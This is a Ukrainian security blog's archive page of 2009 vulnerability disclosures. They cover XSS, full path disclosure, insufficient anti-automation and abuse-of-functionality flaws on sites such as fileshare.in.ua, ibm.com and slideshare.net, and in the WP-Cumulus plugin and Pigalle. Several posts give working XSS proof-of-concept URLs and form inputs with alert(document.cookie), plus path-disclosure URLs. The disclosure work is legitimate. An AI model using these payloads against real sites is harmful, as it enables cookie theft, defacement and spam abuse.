Архів для категорії 'Уразливості'

Уразливості на fileshare.in.ua

20:05 10.11.2009

27.03.2009

У липні, 11.07.2008, я знайшов Insufficient Authorization, Insufficient Anti-automation та Cross-Site Scripting уразливості на http://fileshare.in.ua (файлообмінник та хостінг файлів). Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливість на fileshare.in.ua та нові уразливості на fileshare.in.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

10.11.2009

Insufficient Authorization:

http://fileshare.in.ua/748475?fedit

Можливе вільне редагування описів файлів.

Insufficient Anti-automation:

http://fileshare.in.ua/748475?fedit

Відсутній захист від автоматизованих запитів (капча).

XSS (persistent):

POST запит на сторінці http://fileshare.in.ua/748475?fedit
<script>alert(document.cookie)</script>В полях: Имя файла, Описание, Теги.

XSS:

Дані уразливості вже виправлені. Але остання уразливість виправлена не повністю і при невеликій зміні атакуючого коду, знову працює.

XSS (Mozilla):

Уразливості в WP-Cumulus для WordPress

23:58 09.11.2009

У березні, 15.03.2009, я знайшов Full path disclosure та Cross-Site Scripting уразливості в плагіні WP-Cumulus для WordPress. Про що найближчим часом повідомлю розробникам.

Дірки я виявив на http://glaive.org.ua - сайті Glaive Security Group. І як я виявив нещодавно, хлопці явно зрозуміли, що не потрібно “страждати дірявістю” з дірявим WordPress та дірявими плагінами до нього, і прибрали WP зі свого сайта ;-) .

Full path disclosure:

http://site/wp-content/plugins/wp-cumulus/wp-cumulus.php

XSS:

http://site/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS.

Також можна провести HTML Injection атаку, в тому числі на ті флешки, де заборонені (у флешках чи через WAF) javascript та vbscript URI в параметрі tagcloud.

HTML Injection:

http://site/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Уразливі WP-Cumulus 1.22 та попередні версії. В версії 1.23 розробником була виправлена XSS, але не HTML Injection.

Добірка уразливостей

16:10 09.11.2009

В даній добірці уразливості в веб додатках:

  • ntop <= 3.3.10 Basic Authentication Null Pointer Denial of Service (деталі)
  • Blogsa <= 1.0 Beta 3 XSS Vulnerability (деталі)
  • Zabbix 1.6.2 Frontend Multiple Vulnerabilities (деталі)
  • BlindBlog 1.3.1 Multiple Vulnerabilities (SQL Inj - Auth Bypass - LFI) (деталі)
  • NovaBoard <= 1.0.1 / XSS Vulnerability (деталі)
  • HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code, Denial of Service (DoS) (деталі)
  • TikiWiki 2.2 XSS Vulnerability in URI (деталі)
  • Trellis Desk v1.0 XSS Vulnerability (деталі)
  • NextApp Echo XML Injection Vulnerability (деталі)
  • Sun Java System Communications Express [HTML Injection] (деталі)

Уразливості в Pigalle

19:21 07.11.2009

15.09.2009

У січні, 23.01.2009, я знайшов Information Leakage, Full path disclosure та Cross-Site Scripting уразливості в Pigalle. Це веб додаток від автора Power Phlogger та YaBook. Уразливості виявив на офіційному сайті http://pigalle.phpee.com. Про що найближчим часом повідомлю розробнику.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробнику веб додатка.

07.11.2009

Information Leakage:

http://site/index.php

В meta-тегах на всіх сторінках виводиться інформація про версію PHP, MySQL і веб сервера.

Full path disclosure:

http://site/index.php

http://site/index.php?start=1′

http://site/index.php?mode=view&alb=IBM_Stucki&pic=1

http://site/index.php?mode=view&alb=1

http://site/index.php?mode=view

http://site/index.php?mode=album

http://site/index.php?mode=album&alb=1

http://site/config.inc.php

http://site/index.php?mode=view&alb=IBM_Stucki&pic=Image3.jpg&size=’

XSS:

http://site/index.php?mode=view&alb=IBM_Stucki&pic=%3CBODY%20onload=alert(document.cookie)%3E
http://site/index.php?mode=view&alb=%3CBODY%20onload=alert(document.cookie)%3E
http://site/index.php?mode=view&alb=IBM_Stucki&pic=Image3.jpg&size=%3CBODY%20onload=alert(document.cookie)%3E

Уразливі Pigalle 0.76-alpha та попередні версії.

DoS уразливість в Internet Explorer

23:52 06.11.2009

Сьогодні я підтвердив свої підозри стосовно Denial of Service уразливості в Internet Explorer. Ще в літку 2008 я здогадувався про існування цієї уразливості й лише сьогодні перевирів її, під час написання своєї статті.

Дану атаку я назвав DoS через хоумпейдж (DoS via homepage attack).

DoS:

IE DoS Exploit10.html

При запуску експлоіта в IE6 браузер блокується, ним стає неможливо користуватися і його можна лише закрити (через Task Manager).

При запуску експлоіта в IE7 і кліку по лінці браузер зависає.

Уразлива версія Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.0.6000.16711) та попередні версії (та потенційно й наступні версії).

Добірка уразливостей

16:12 06.11.2009

В даній добірці уразливості в веб додатках:

  • AREVA e-terrahabitat / e-terraplatform Multiple Vulnerabilities (деталі)
  • EZ-Blog Beta 1 Multiple SQL Injection (деталі)
  • BlogMan 0.45 Multiple Vulnerabilities (деталі)
  • YEKTA WEB Academic Web Tools CMS Multiple XSS (деталі)
  • Afian Document Manager Local File Inclusion (деталі)
  • Drupal Local File Inclusion Vulnerability (Windows) (деталі)
  • HP OpenView Network Node Manager (OV NNM), Remote Unauthorized Access to Data (деталі)
  • HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code, Denial of Service (DoS) (деталі)
  • eXtplorer Remote Code Execution (деталі)
  • RitsBlog 0.4.2 (Authentication Bypass) SQL Injection Vulnerability / XSS Persistent Vulnerability (деталі)

Нові уразливості на www.ibm.com

23:55 04.11.2009

У березні, 10.03.2009, я знайшов Insufficient Anti-automation та Abuse of Functionality уразливості на http://www.ibm.com - сайті компанії IBM. Яка є секюріті компанією (після купівлі ISS і Watchfire). Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на www.ibm.com.

Insufficient Anti-automation:

В формі “E-mail this page” на сторінках сайта http://www.ibm.com (www.ibm.com, www-01.ibm.com та інших доменах) немає захисту від автоматизованих запитів (капчі).

Abuse of Functionality:

В даній формі можна вказати емайл, ім’я та призвіще отримувача, емайл, ім’я та призвіще відправника, тому її можна використати для розсилання спаму. А з врахуванням функції “Send me a copy of this e-mail” та Insufficient Anti-automation, дана уразливість створює з форми цілий Spam Gateway.

Добірка уразливостей

16:13 04.11.2009

В даній добірці уразливості в веб додатках:

  • CA Secure Content Manager HTTP Gateway Service FTP Request Vulnerabilities (деталі)
  • CA ETrust Secure Content Manager Gateway FTP LIST Stack Overflow Vulnerability (деталі)
  • CA ETrust Secure Content Manager Gateway FTP LIST Stack Overflow Vulnerability (деталі)
  • CA ETrust Secure Content Manager Gateway FTP LIST Stack Overflow (деталі)
  • CA ETrust Secure Content Manager Gateway FTP PASV Stack Overflow Vulnerability (деталі)
  • taifajobs <= 1.0 (jobid) Remote SQL Injection Vulnerability (деталі)
  • Golabi CMS Remote File Inclusion Vulnerability (деталі)
  • JOnAS(4.10.3) - Linked XSS Vulnerability (деталі)
  • Multiple vulnerabilities in OpenSite v2.1 (деталі)
  • pPIM Multiple Vulnerabilities (деталі)

Нові уразливості на www.slideshare.net

19:28 03.11.2009

22.07.2009

У листопаді, 26.11.2008, я знайшов Insufficient Anti-automation та Abuse of Functionality уразливості на проекті http://www.slideshare.net. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на www.slideshare.net.

Детальна інформація про уразливості з’явиться пізніше.

03.11.2009

Insufficient Anti-automation:

http://www.slideshare.net/signup

В формі реєстрації немає захисту від автоматизованих запитів (капчі).

Abuse of Functionality:

http://www.slideshare.net/account/username_check?login=12345

Через функцію перевірки логіна можливе визначення логінів на сайті.

Abuse of Functionality:

http://www.slideshare.net/account/email_check?email=1@1.com

Через функцію перевірки емайлів можливе визначення емайлів на сайті.

Дані уразливості досі не виправлені.

Добірка уразливостей

16:15 31.10.2009

В даній добірці уразливості в веб додатках:

  • Remote DoS vulnerability in Linksys WRH54G (деталі)
  • Multiple Vulnerabilities in RavenNuke 2.3.0 (деталі)
  • New websvn packages fix information leak (деталі)
  • Cross-site scripting in Samizdat 0.6.1 (деталі)
  • New moodle packages fix several vulnerabilities (деталі)
  • Squid Proxy Cache Denial of Service in request handling (деталі)
  • NetMRI Login Application Cross-site Scripting Vulnerability (деталі)
  • PHCDownload 1.1.0 Vulnerabilities (деталі)
  • Cisco Unified MeetingPlace Web Conferencing Stored Cross Site Scripting Vulnerability (деталі)
  • Cisco Unified MeetingPlace Web Conferencing Authentication Bypass Vulnerability (деталі)